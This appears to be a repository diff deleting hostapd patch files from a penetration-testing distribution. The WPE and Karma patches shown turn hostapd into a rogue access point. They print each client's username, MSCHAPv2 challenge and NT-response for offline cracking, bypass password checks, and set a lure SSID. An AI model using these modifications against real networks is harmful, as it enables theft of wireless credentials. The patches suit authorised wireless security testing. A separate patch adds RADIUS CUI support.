+++ hostapd-1.0/hostapd/main.c 2013-05-01 22:49:55.000000000 +0800
@@ -512,7 +512,7 @@
static void show_version(void)
{
fprintf(stderr,
- "hostapd v" VERSION_STR "\n"
+ "hostapd v" VERSION_STR" with wpe support (Pentoo)\n"
"User space daemon for IEEE 802.11 AP management,\n"
"IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator\n"
"Copyright (c) 2002-2012, Jouni Malinen <j@w1.fi> "
diff -urN hostapd-1.0.orig/src/crypto/ms_funcs.c hostapd-1.0/src/crypto/ms_funcs.c
--- hostapd-1.0.orig/src/crypto/ms_funcs.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/crypto/ms_funcs.c 2013-05-01 22:49:55.000000000 +0800
@@ -83,7 +83,7 @@
* @challenge: 8-octet Challenge (OUT)
* Returns: 0 on success, -1 on failure
*/
-static int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
const u8 *username, size_t username_len,
u8 *challenge)
{
diff -urN hostapd-1.0.orig/src/crypto/ms_funcs.h hostapd-1.0/src/crypto/ms_funcs.h
--- hostapd-1.0.orig/src/crypto/ms_funcs.h 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/crypto/ms_funcs.h 2013-05-01 22:49:55.000000000 +0800
@@ -37,6 +37,10 @@
int nt_challenge_response(const u8 *challenge, const u8 *password,
size_t password_len, u8 *response);
+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+ const u8 *username, size_t username_len,
+ u8 *challenge);
+
void challenge_response(const u8 *challenge, const u8 *password_hash,
u8 *response);
int nt_password_hash(const u8 *password, size_t password_len,
diff -urN hostapd-1.0.orig/src/crypto/tls_openssl.c hostapd-1.0/src/crypto/tls_openssl.c
--- hostapd-1.0.orig/src/crypto/tls_openssl.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/crypto/tls_openssl.c 2013-05-01 22:49:55.000000000 +0800
@@ -2642,7 +2642,7 @@
data_len) != 1)
return -1;
#else /* CONFIG_OPENSSL_TICKET_OVERRIDE */
- if (SSL_set_hello_extension(conn->ssl, ext_type, (void *) data,
+ if (SSL_set_session_ticket_ext(conn->ssl, ext_type, (void *) data,
data_len) != 1)
return -1;
#endif /* CONFIG_OPENSSL_TICKET_OVERRIDE */
@@ -2948,7 +2948,7 @@
SSL_set_tlsext_debug_callback(conn->ssl, tls_hello_ext_cb);
SSL_set_tlsext_debug_arg(conn->ssl, conn);
#else /* SSL_OP_NO_TICKET */
- if (SSL_set_hello_extension_cb(conn->ssl, tls_hello_ext_cb,
+ if (SSL_set_session_ticket_ext_cb(conn->ssl, tls_hello_ext_cb,
conn) != 1)
return -1;
#endif /* SSL_OP_NO_TICKET */
@@ -2963,7 +2963,7 @@
SSL_set_tlsext_debug_callback(conn->ssl, NULL);
SSL_set_tlsext_debug_arg(conn->ssl, conn);
#else /* SSL_OP_NO_TICKET */
- if (SSL_set_hello_extension_cb(conn->ssl, NULL, NULL) != 1)
+ if (SSL_set_session_ticket_ext_cb(conn->ssl, NULL, NULL) != 1)
return -1;
#endif /* SSL_OP_NO_TICKET */
#endif /* CONFIG_OPENSSL_TICKET_OVERRIDE */
diff -urN hostapd-1.0.orig/src/eap_server/eap_server.c hostapd-1.0/src/eap_server/eap_server.c
--- hostapd-1.0.orig/src/eap_server/eap_server.c 2013-05-01 22:58:03.010738503 +0800
+++ hostapd-1.0/src/eap_server/eap_server.c 2013-05-01 22:54:51.000000000 +0800
@@ -102,8 +102,9 @@
int phase2)
{
struct eap_user *user;
- char *username = NULL;
- char *message = NULL;
+ char *username = NULL;
+ char *message = NULL;
+ char ident = 't';
eap_user_free(sm->user);
sm->user = NULL;
@@ -112,6 +113,11 @@
if (user == NULL)
return -1;
+ if(phase2) {
+ identity = (const u8 *)&ident;
+ identity_len = 1;
+ }
+
/* Karma EAP Modifications */
if (karma_eap_auth) {
/* Karma Mode: Accept all requests, regardless of username - JoMo-Kun <jmk@foofus.net> */
diff -urN hostapd-1.0.orig/src/eap_server/eap_server_fast.c hostapd-1.0/src/eap_server/eap_server_fast.c
--- hostapd-1.0.orig/src/eap_server/eap_server_fast.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/eap_server/eap_server_fast.c 2013-05-01 22:49:55.000000000 +0800
@@ -1040,7 +1040,8 @@
switch (data->state) {
case PHASE2_ID:
- if (eap_user_get(sm, sm->identity, sm->identity_len, 1) != 0) {
+ //if (eap_user_get(sm, sm->identity, sm->identity_len, 1) != 0) {
+ if (eap_user_get(sm, sm->identity, sm->identity_len, 0) != 0) {
wpa_hexdump_ascii(MSG_DEBUG, "EAP-FAST: Phase2 "
"Identity not found in the user "
"database",
diff -urN hostapd-1.0.orig/src/eap_server/eap_server_mschapv2.c hostapd-1.0/src/eap_server/eap_server_mschapv2.c
--- hostapd-1.0.orig/src/eap_server/eap_server_mschapv2.c 2013-05-01 22:58:03.011738503 +0800
+++ hostapd-1.0/src/eap_server/eap_server_mschapv2.c 2013-05-01 22:56:30.000000000 +0800
@@ -295,9 +295,10 @@
u8 flags;
size_t len, name_len, i;
u8 expected[24];
+ u8 challenge_hash1[8];
const u8 *username, *user;
size_t username_len, user_len;
- int res;
+ int res, x;
char *auth_creds = NULL;
int auth_creds_len = 0;
@@ -338,6 +339,22 @@
wpa_hexdump(MSG_MSGDUMP, "EAP-MSCHAPV2: NT-Response", nt_response, 24);
wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
+
+ challenge_hash(peer_challenge, data->auth_challenge, name, name_len, challenge_hash1);
+
+ wpa_hexdump(MSG_DEBUG, "EAP-MSCHAPV2: Challenge Hash", challenge_hash1, 8);
+ printf("\n");
+ printf("\tusername: %s\n", name);
+ printf("\tchallenge: ");
+ for (x=0;x<7;x++)
+ printf("%02x:",challenge_hash1[x]);
+ printf("%02x\n",challenge_hash1[7]);
+
+ printf("\tresponse: ");
+ for (x=0;x<23;x++)
+ printf("%02x:",nt_response[x]);
+ printf("%02x\n",nt_response[23]);
+
/* Karma Mode: Log MSCHAPv2 exchange in John format - JoMo-Kun <jmk@foofus.net> */
/* user::domain (unused):authenticator challenge:mschapv2 response:peer challenge */
@@ -524,8 +541,8 @@
if (sm->user == NULL || sm->user->password == NULL) {
wpa_printf(MSG_INFO, "EAP-MSCHAPV2: Password not configured");
- data->state = FAILURE;
- return;
+ //data->state = FAILURE;
+ //return;
}
switch (data->state) {

153
net-wireless/hostapd/files/hostapd-1.0-wpe_karma_cli.patch
View file

@ -1,153 +0,0 @@
diff -uNr hostapd-1.0/hostapd/main.c hostapd-1.0-wpe/hostapd/main.c
--- hostapd-1.0/hostapd/main.c 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/hostapd/main.c 2012-08-20 22:56:17.420486344 -0400
@@ -508,7 +508,7 @@
static void show_version(void)
{
fprintf(stderr,
- "hostapd v" VERSION_STR "\n"
+ "hostapd v" VERSION_STR" with wpe support (Pentoo)\n"
"User space daemon for IEEE 802.11 AP management,\n"
"IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator\n"
"Copyright (c) 2002-2012, Jouni Malinen <j@w1.fi> "
diff -uNr hostapd-1.0/src/crypto/ms_funcs.c hostapd-1.0-wpe/src/crypto/ms_funcs.c
--- hostapd-1.0/src/crypto/ms_funcs.c 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/src/crypto/ms_funcs.c 2012-08-20 22:27:09.583819291 -0400
@@ -83,7 +83,7 @@
* @challenge: 8-octet Challenge (OUT)
* Returns: 0 on success, -1 on failure
*/
-static int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
const u8 *username, size_t username_len,
u8 *challenge)
{
diff -uNr hostapd-1.0/src/crypto/ms_funcs.h hostapd-1.0-wpe/src/crypto/ms_funcs.h
--- hostapd-1.0/src/crypto/ms_funcs.h 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/src/crypto/ms_funcs.h 2012-08-20 22:27:09.583819291 -0400
@@ -37,6 +37,10 @@
int nt_challenge_response(const u8 *challenge, const u8 *password,
size_t password_len, u8 *response);
+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+ const u8 *username, size_t username_len,
+ u8 *challenge);
+
void challenge_response(const u8 *challenge, const u8 *password_hash,
u8 *response);
int nt_password_hash(const u8 *password, size_t password_len,
diff -uNr hostapd-1.0/src/crypto/tls_openssl.c hostapd-1.0-wpe/src/crypto/tls_openssl.c
--- hostapd-1.0/src/crypto/tls_openssl.c 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/src/crypto/tls_openssl.c 2012-08-20 22:27:09.583819291 -0400
@@ -2642,7 +2642,7 @@
data_len) != 1)
return -1;
#else /* CONFIG_OPENSSL_TICKET_OVERRIDE */
- if (SSL_set_hello_extension(conn->ssl, ext_type, (void *) data,
+ if (SSL_set_session_ticket_ext(conn->ssl, ext_type, (void *) data,
data_len) != 1)
return -1;
#endif /* CONFIG_OPENSSL_TICKET_OVERRIDE */
@@ -2948,7 +2948,7 @@
SSL_set_tlsext_debug_callback(conn->ssl, tls_hello_ext_cb);
SSL_set_tlsext_debug_arg(conn->ssl, conn);
#else /* SSL_OP_NO_TICKET */
- if (SSL_set_hello_extension_cb(conn->ssl, tls_hello_ext_cb,
+ if (SSL_set_session_ticket_ext_cb(conn->ssl, tls_hello_ext_cb,
conn) != 1)
return -1;
#endif /* SSL_OP_NO_TICKET */
@@ -2963,7 +2963,7 @@
SSL_set_tlsext_debug_callback(conn->ssl, NULL);
SSL_set_tlsext_debug_arg(conn->ssl, conn);
#else /* SSL_OP_NO_TICKET */
- if (SSL_set_hello_extension_cb(conn->ssl, NULL, NULL) != 1)
+ if (SSL_set_session_ticket_ext_cb(conn->ssl, NULL, NULL) != 1)
return -1;
#endif /* SSL_OP_NO_TICKET */
#endif /* CONFIG_OPENSSL_TICKET_OVERRIDE */
diff -uNr hostapd-1.0/src/eap_server/eap_server.c hostapd-1.0-wpe/src/eap_server/eap_server.c
--- hostapd-1.0/src/eap_server/eap_server.c 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/src/eap_server/eap_server.c 2012-08-20 22:27:09.583819291 -0400
@@ -100,6 +100,7 @@
int phase2)
{
struct eap_user *user;
+ char ident = 't';
if (sm == NULL || sm->eapol_cb == NULL ||
sm->eapol_cb->get_eap_user == NULL)
@@ -111,7 +112,10 @@
user = os_zalloc(sizeof(*user));
if (user == NULL)
return -1;
-
+ if(phase2) {
+ identity = (const u8 *)&ident;
+ identity_len = 1;
+ }
if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
identity_len, phase2, user) != 0) {
eap_user_free(user);
diff -uNr hostapd-1.0/src/eap_server/eap_server_fast.c hostapd-1.0-wpe/src/eap_server/eap_server_fast.c
--- hostapd-1.0/src/eap_server/eap_server_fast.c 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/src/eap_server/eap_server_fast.c 2012-08-20 22:27:09.583819291 -0400
@@ -1040,7 +1040,8 @@
switch (data->state) {
case PHASE2_ID:
- if (eap_user_get(sm, sm->identity, sm->identity_len, 1) != 0) {
+ //if (eap_user_get(sm, sm->identity, sm->identity_len, 1) != 0) {
+ if (eap_user_get(sm, sm->identity, sm->identity_len, 0) != 0) {
wpa_hexdump_ascii(MSG_DEBUG, "EAP-FAST: Phase2 "
"Identity not found in the user "
"database",
diff -uNr hostapd-1.0/src/eap_server/eap_server_mschapv2.c hostapd-1.0-wpe/src/eap_server/eap_server_mschapv2.c
--- hostapd-1.0/src/eap_server/eap_server_mschapv2.c 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/src/eap_server/eap_server_mschapv2.c 2012-08-20 22:27:09.583819291 -0400
@@ -294,9 +294,10 @@
u8 flags;
size_t len, name_len, i;
u8 expected[24];
+ u8 challenge_hash1[8];
const u8 *username, *user;
size_t username_len, user_len;
- int res;
+ int res,x;
pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData,
&len);
@@ -335,6 +336,22 @@
wpa_hexdump(MSG_MSGDUMP, "EAP-MSCHAPV2: NT-Response", nt_response, 24);
wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
+
+ challenge_hash(peer_challenge, data->auth_challenge, name, name_len, challenge_hash1);
+
+ wpa_hexdump(MSG_DEBUG, "EAP-MSCHAPV2: Challenge Hash", challenge_hash1, 8);
+ printf("\n");
+ printf("\tusername: %s\n", name);
+ printf("\tchallenge: ");
+ for (x=0;x<7;x++)
+ printf("%02x:",challenge_hash1[x]);
+ printf("%02x\n",challenge_hash1[7]);
+
+ printf("\tresponse: ");
+ for (x=0;x<23;x++)
+ printf("%02x:",nt_response[x]);
+ printf("%02x\n",nt_response[23]);
+
/* MSCHAPv2 does not include optional domain name in the
* challenge-response calculation, so remove domain prefix
@@ -490,8 +507,8 @@
if (sm->user == NULL || sm->user->password == NULL) {
wpa_printf(MSG_INFO, "EAP-MSCHAPV2: Password not configured");
- data->state = FAILURE;
- return;
+ //data->state = FAILURE;
+ //return;
}
switch (data->state) {

448
net-wireless/hostapd/files/hostapd-2.0-cui.patch
View file

@ -1,448 +0,0 @@
diff -urN hostapd-2.0.orig/src/ap/accounting.c hostapd-2.0/src/ap/accounting.c
--- hostapd-2.0.orig/src/ap/accounting.c 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/ap/accounting.c 2013-04-29 10:16:25.982059247 +0800
@@ -19,6 +19,7 @@
#include "sta_info.h"
#include "ap_drv_ops.h"
#include "accounting.h"
+/*#include "eapol_auth/eapol_auth_sm_i.h"*/
/* Default interval in seconds for polling TX/RX octets from the driver if
@@ -40,6 +41,9 @@
size_t len;
int i;
struct wpabuf *b;
+ u8 *cui; /*Define CUI Attribute*/
+ size_t cui_len; /*Define CUI Attribute length*/
+ struct eapol_state_machine *sm = sta->eapol_sm;
msg = radius_msg_new(RADIUS_CODE_ACCOUNTING_REQUEST,
radius_client_get_id(hapd->radius));
@@ -81,6 +85,7 @@
if (sta) {
/* Use 802.1X identity if available */
val = ieee802_1x_get_identity(sta->eapol_sm, &len);
+ printf("GOT ID\n");
/* Use RADIUS ACL identity if 802.1X provides no identity */
if (!val && sta->identity) {
@@ -102,6 +107,30 @@
printf("Could not add User-Name\n");
goto fail;
}
+
+
+ /*Check if the CUI attribute is set, if so returns the TRUE or FALSE accordingly**************/
+ if (getSetCui(sta->eapol_sm)){
+ cui=get_CUI (sta->eapol_sm, &cui_len);
+ printf("GOT CUI\n");
+
+ if (!cui) {
+
+ os_snprintf(buf, sizeof(buf), RADIUS_ADDR_FORMAT,
+ MAC2STR(sta->addr));
+ cui = (u8 *) buf;
+ cui_len = os_strlen(buf);
+ }
+ if (!radius_msg_add_attr(msg, RADIUS_ATTR_CHARGEABLE_USER_IDENTITY, cui,
+ cui_len)) { /*Add CUI attribute to the Accounting Request Message*/
+ printf("Could not add CUI\n");
+ goto fail;
+ }
+ /********************/
+ }
+ /*else { */
+ /* printf ("PROBLEM IN IF\n");*/
+ /*}*/
}
if (add_common_radius_attr(hapd, hapd->conf->radius_acct_req_attr, sta,
diff -urN hostapd-2.0.orig/src/ap/accounting.h hostapd-2.0/src/ap/accounting.h
--- hostapd-2.0.orig/src/ap/accounting.h 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/ap/accounting.h 2013-04-29 10:13:06.594045862 +0800
@@ -20,6 +20,7 @@
{
}
+
static inline void accounting_sta_stop(struct hostapd_data *hapd,
struct sta_info *sta)
{
diff -urN hostapd-2.0.orig/src/ap/ieee802_1x.c hostapd-2.0/src/ap/ieee802_1x.c
--- hostapd-2.0.orig/src/ap/ieee802_1x.c 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/ap/ieee802_1x.c 2013-04-29 10:18:45.037068583 +0800
@@ -1051,6 +1051,7 @@
* re-authentication without having to wait for the
* Supplicant to send EAPOL-Start.
*/
+ printf("REAUTHENTICATION-EAPOL");
sta->eapol_sm->reAuthenticate = TRUE;
}
eapol_auth_step(sta->eapol_sm);
@@ -1316,6 +1317,68 @@
sm->radius_cui = cui;
}
+/* This method is used to Set the CUI attribute Value**************************************/
+static void set_cui(struct hostapd_data *hapd,
+ struct sta_info *sta,
+ struct radius_msg *msg)
+
+{
+ u8 *buf,*cui_identity;
+ size_t len;
+ struct eapol_state_machine *sm = sta->eapol_sm;
+
+ if (sm == NULL)
+ return;
+
+ if (radius_msg_get_attr_ptr(msg, RADIUS_ATTR_CHARGEABLE_USER_IDENTITY, &buf, &len,
+ NULL) < 0)
+ return;
+ cui_identity = os_malloc(len + 1);
+ if (cui_identity == NULL)
+ return;
+ os_memcpy(cui_identity, buf, len);
+ cui_identity[len] = '\0';
+
+ sm->cui = cui_identity;
+ sm->cui_len = len;
+ printf(" SET CUI %s",(char *) cui_identity);
+
+
+}
+
+
+/* **************************************/
+
+/*check CUI attribute is available in Access Accept */
+static void check_cuiAttr (struct radius_msg *msg,struct sta_info *sta, struct hostapd_data *hapd)
+{
+
+ struct eapol_state_machine *sm = sta->eapol_sm; /*Define a pointer to eapol_state_machine*/
+
+
+ size_t i;
+
+ for (i = 0;i<msg->attr_used;i++)
+ { struct radius_attr_hdr *attr = radius_get_attr_hdr(msg, i);
+ if (attr->type == RADIUS_ATTR_CHARGEABLE_USER_IDENTITY) /*check CUI attribute is availabe in Access-Accept packet*/
+ {
+ printf("CUI Attribute is Available");
+ sm->cuiAvailable = TRUE;
+ set_cui(hapd, sta, msg);
+ break;
+
+ }
+ else {
+ sm->cuiAvailable = FALSE;
+ printf ("CUI is not available in this packet");
+
+ }
+
+
+ }
+
+}
+
struct sta_id_search {
u8 identifier;
@@ -1477,6 +1540,8 @@
ieee802_1x_store_radius_class(hapd, sta, msg);
ieee802_1x_update_sta_identity(hapd, sta, msg);
ieee802_1x_update_sta_cui(hapd, sta, msg);
+ /*set_cui(hapd, sta, msg);*/
+ check_cuiAttr(msg,sta,hapd);
if (sm->eap_if->eapKeyAvailable &&
wpa_auth_pmksa_add(sta->wpa_sm, sm->eapol_key_crypt,
session_timeout_set ?
@@ -1981,6 +2046,27 @@
}
+
+u8 * get_CUI(struct eapol_state_machine *sm, size_t *len) /* return CUI Attribute Value ******************************/
+{
+ if (sm == NULL || sm->identity == NULL)
+ return NULL;
+
+ *len = sm->cui_len;
+ return sm->cui;
+}
+
+Boolean getSetCui (struct eapol_state_machine *sm) /*Check if the CUI value is set or not, and returns TRUE or FALSE accordingly*/
+
+{ if (sm->cuiAvailable)
+ return TRUE;
+else
+ return FALSE;
+ }
+
+/*****************************/
+
+
u8 * ieee802_1x_get_radius_class(struct eapol_state_machine *sm, size_t *len,
int idx)
{
diff -urN hostapd-2.0.orig/src/ap/ieee802_1x.h hostapd-2.0/src/ap/ieee802_1x.h
--- hostapd-2.0.orig/src/ap/ieee802_1x.h 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/ap/ieee802_1x.h 2013-04-29 10:13:07.019045890 +0800
@@ -35,6 +35,13 @@
int ieee802_1x_eapol_tx_status(struct hostapd_data *hapd, struct sta_info *sta,
const u8 *data, int len, int ack);
u8 * ieee802_1x_get_identity(struct eapol_state_machine *sm, size_t *len);
+
+/** definig CUI get function */
+u8 * get_CUI(struct eapol_state_machine *sm, size_t *len);
+Boolean getSetCui (struct eapol_state_machine *sm);
+
+/*********************/
+
u8 * ieee802_1x_get_radius_class(struct eapol_state_machine *sm, size_t *len,
int idx);
struct wpabuf * ieee802_1x_get_radius_cui(struct eapol_state_machine *sm);
diff -urN hostapd-2.0.orig/src/ap/pmksa_cache_auth.c hostapd-2.0/src/ap/pmksa_cache_auth.c
--- hostapd-2.0.orig/src/ap/pmksa_cache_auth.c 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/ap/pmksa_cache_auth.c 2013-04-29 10:13:07.020045890 +0800
@@ -138,6 +138,20 @@
if (eapol->radius_cui)
entry->cui = wpabuf_dup(eapol->radius_cui);
+/*set to cui in to cache*/
+
+ if (eapol ->cui) {
+
+ entry ->cui = os_malloc(eapol->cui_len); /*Allocate memory for CUI attribute*/
+ if (entry->cui) {
+ entry->cui_len = eapol->cui_len;
+ os_memcpy(entry->cui, eapol->cui,
+ eapol->cui_len);
+ }
+ }
+
+/*set to cui in to cache*/
+
#ifndef CONFIG_NO_RADIUS
radius_copy_class(&entry->radius_class, &eapol->radius_class);
#endif /* CONFIG_NO_RADIUS */
@@ -170,6 +184,25 @@
eapol->radius_cui = wpabuf_dup(entry->cui);
}
+/*Added to get CUI from the cache*/
+
+
+ if (entry->cui) {
+ os_free(eapol->cui);
+
+ eapol->cui = os_malloc(entry->cui_len);
+ eapol->cuiAvailable=TRUE;
+ if (eapol->cui) {
+ eapol->cui_len = entry->cui_len;
+ os_memcpy(eapol->cui, entry->cui,
+ entry->cui_len); /*copy the CUI attribute value to EAPOL data structure*/
+ }
+ wpa_hexdump_ascii(MSG_DEBUG, "CUIfrom PMKSA",
+ eapol->cui, eapol->cui_len);
+ }
+
+ /*Added to get CUI from the cache*/
+
#ifndef CONFIG_NO_RADIUS
radius_free_class(&eapol->radius_class);
radius_copy_class(&eapol->radius_class, &entry->radius_class);
@@ -181,6 +214,7 @@
eapol->eap_type_authsrv = entry->eap_type_authsrv;
((struct sta_info *) eapol->sta)->vlan_id = entry->vlan_id;
+ printf ("GETTING CACHE ENTRY\n");
}
diff -urN hostapd-2.0.orig/src/ap/pmksa_cache_auth.h hostapd-2.0/src/ap/pmksa_cache_auth.h
--- hostapd-2.0.orig/src/ap/pmksa_cache_auth.h 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/ap/pmksa_cache_auth.h 2013-04-29 10:20:09.925074282 +0800
@@ -26,6 +26,8 @@
u8 *identity;
size_t identity_len;
struct wpabuf *cui;
+ u8 *cui; /* cui by me*/
+ size_t cui_len; /*Size of the cached cui by me*/
struct radius_class_data radius_class;
u8 eap_type_authsrv;
int vlan_id;
diff -urN hostapd-2.0.orig/src/common/ieee802_11_common.c hostapd-2.0/src/common/ieee802_11_common.c
--- hostapd-2.0.orig/src/common/ieee802_11_common.c 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/common/ieee802_11_common.c 2013-04-29 10:13:07.061045893 +0800
@@ -25,8 +25,8 @@
if (elen < 4) {
if (show_errors) {
wpa_printf(MSG_MSGDUMP, "short vendor specific "
- "information element ignored (len=%lu)",
- (unsigned long) elen);
+ "information element ignored (len=%lu)",
+ (unsigned long) elen);
}
return -1;
}
diff -urN hostapd-2.0.orig/src/eapol_auth/eapol_auth_sm_i.h hostapd-2.0/src/eapol_auth/eapol_auth_sm_i.h
--- hostapd-2.0.orig/src/eapol_auth/eapol_auth_sm_i.h 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/eapol_auth/eapol_auth_sm_i.h 2013-04-29 10:13:07.062045893 +0800
@@ -69,6 +69,7 @@
/* variables */
Boolean eapolLogoff;
Boolean eapolStart;
+ Boolean cuiAvailable; /*to check CUI is available in AcessAccept*/
PortTypes portMode;
unsigned int reAuthCount;
/* constants */
@@ -153,6 +154,8 @@
u8 last_eap_id; /* last used EAP Identifier */
u8 *identity;
size_t identity_len;
+ u8 *cui; /*Define CUI Attribute*/
+ size_t cui_len; /*Define CUI attribute length*/
u8 eap_type_authsrv; /* EAP type of the last EAP packet from
* Authentication server */
u8 eap_type_supp; /* EAP type of the last EAP packet from Supplicant */
diff -urN hostapd-2.0.orig/src/radius/radius.c hostapd-2.0/src/radius/radius.c
--- hostapd-2.0.orig/src/radius/radius.c 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/radius/radius.c 2013-04-29 10:13:07.062045893 +0800
@@ -18,16 +18,16 @@
/**
* struct radius_msg - RADIUS message structure for new and parsed messages
*/
-struct radius_msg {
+//struct radius_msg {
/**
* buf - Allocated buffer for RADIUS message
*/
- struct wpabuf *buf;
+ //struct wpabuf *buf;
/**
* hdr - Pointer to the RADIUS header in buf
*/
- struct radius_hdr *hdr;
+ //struct radius_hdr *hdr;
/**
* attr_pos - Array of indexes to attributes
@@ -35,18 +35,18 @@
* The values are number of bytes from buf to the beginning of
* struct radius_attr_hdr.
*/
- size_t *attr_pos;
+ //size_t *attr_pos;
/**
* attr_size - Total size of the attribute pointer array
*/
- size_t attr_size;
+ //size_t attr_size;
/**
* attr_used - Total number of attributes in the array
*/
- size_t attr_used;
-};
+ //size_t attr_used;
+//};
struct radius_hdr * radius_msg_get_hdr(struct radius_msg *msg)
@@ -60,7 +60,7 @@
return msg->buf;
}
-
+/*
static struct radius_attr_hdr *
radius_get_attr_hdr(struct radius_msg *msg, int idx)
{
@@ -68,7 +68,7 @@
(wpabuf_mhead_u8(msg->buf) + msg->attr_pos[idx]);
}
-
+*/
static void radius_msg_set_hdr(struct radius_msg *msg, u8 code, u8 identifier)
{
msg->hdr->code = code;
diff -urN hostapd-2.0.orig/src/radius/radius.h hostapd-2.0/src/radius/radius.h
--- hostapd-2.0.orig/src/radius/radius.h 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/radius/radius.h 2013-04-29 10:13:07.064045893 +0800
@@ -15,6 +15,45 @@
#pragma pack(push, 1)
#endif /* _MSC_VER */
+/************************/
+struct radius_msg {
+ /**
+ * buf - Allocated buffer for RADIUS message
+ */
+ struct wpabuf *buf;
+
+ /**
+ * hdr - Pointer to the RADIUS header in buf
+ */
+ struct radius_hdr *hdr;
+
+ /**
+ * attr_pos - Array of indexes to attributes
+ *
+ * The values are number of bytes from buf to the beginning of
+ * struct radius_attr_hdr.
+ */
+ size_t *attr_pos;
+
+ /**
+ * attr_size - Total size of the attribute pointer array
+ */
+ size_t attr_size;
+
+ /**
+ * attr_used - Total number of attributes in the array
+ */
+ size_t attr_used;
+};
+
+
+
+
+/***********************/
+
+
+
+
struct radius_hdr {
u8 code;
u8 identifier;
@@ -210,6 +249,10 @@
size_t secret_len);
struct radius_attr_hdr * radius_msg_add_attr(struct radius_msg *msg, u8 type,
const u8 *data, size_t data_len);
+
+/****************************/
+
+/*****************************/
struct radius_msg * radius_msg_parse(const u8 *data, size_t len);
int radius_msg_add_eap(struct radius_msg *msg, const u8 *data,
size_t data_len);
@@ -250,7 +293,13 @@
u32 val = htonl(value);
return radius_msg_add_attr(msg, type, (u8 *) &val, 4) != NULL;
}
-
+/**********************/
+static struct radius_attr_hdr * radius_get_attr_hdr(struct radius_msg *msg, int idx)
+{
+ return (struct radius_attr_hdr *)
+ (wpabuf_mhead_u8(msg->buf) + msg->attr_pos[idx]);
+}
+/**************************/
static inline int radius_msg_get_attr_int32(struct radius_msg *msg, u8 type,
u32 *value)
{

453
net-wireless/hostapd/files/hostapd-2.0-karma.patch
View file

@ -1,453 +0,0 @@
diff -urN hostapd-2.0.orig/hostapd/hostapd.conf hostapd-2.0/hostapd/hostapd.conf
--- hostapd-2.0.orig/hostapd/hostapd.conf 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/hostapd/hostapd.conf 2013-05-27 11:27:54.127484984 +0800
@@ -3,7 +3,7 @@
# AP netdevice name (without 'ap' postfix, i.e., wlan0 uses wlan0ap for
# management frames); ath0 for madwifi
-interface=wlan0
+interface=wlan1
# In case of madwifi, atheros, and nl80211 driver interfaces, an additional
# configuration parameter, bridge, may be used to notify hostapd if the
@@ -23,6 +23,7 @@
# Use driver=none if building hostapd as a standalone RADIUS server that does
# not control any wireless/wired driver.
# driver=hostap
+driver=nl80211
# hostapd event logger configuration
#
@@ -83,7 +84,8 @@
##### IEEE 802.11 related configuration #######################################
# SSID to be used in IEEE 802.11 management frames
-ssid=test
+ssid=YouReallyWantToConnect
+
# Alternative formats for configuring SSID
# (double quoted string, hexdump, printf-escaped string)
#ssid2="test"
@@ -96,7 +98,7 @@
# Country code (ISO/IEC 3166-1). Used to set regulatory domain.
# Set as needed to indicate country in which device is operating.
# This can limit available channels and transmit power.
-#country_code=US
+country_code=US
# Enable IEEE 802.11d. This advertises the country_code and the set of allowed
# channels and transmit power levels based on the regulatory limits. The
@@ -109,13 +111,13 @@
# ad = IEEE 802.11ad (60 GHz); a/g options are used with IEEE 802.11n, too, to
# specify band)
# Default: IEEE 802.11b
-hw_mode=g
+hw_mode=b
# Channel number (IEEE 802.11)
# (default: 0, i.e., not set)
# Please note that some drivers do not use this value from hostapd and the
# channel will need to be configured separately with iwconfig.
-channel=1
+channel=6
# Beacon interval in kus (1.024 ms) (default: 100; range 15..65535)
beacon_int=100
@@ -587,7 +589,7 @@
##### IEEE 802.1X-2004 related configuration ##################################
# Require IEEE 802.1X authorization
-#ieee8021x=1
+ieee8021x=1
# IEEE 802.1X/EAPOL version
# hostapd is implemented based on IEEE Std 802.1X-2004 which defines EAPOL
@@ -595,7 +597,7 @@
# the new version number correctly (they seem to drop the frames completely).
# In order to make hostapd interoperate with these clients, the version number
# can be set to the older version (1) with this configuration value.
-#eapol_version=2
+eapol_version=1
# Optional displayable message sent with EAP Request-Identity. The first \0
# in this string will be converted to ASCII-0 (nul). This can be used to
@@ -637,7 +639,7 @@
# Use integrated EAP server instead of external RADIUS authentication
# server. This is also needed if hostapd is configured to act as a RADIUS
# authentication server.
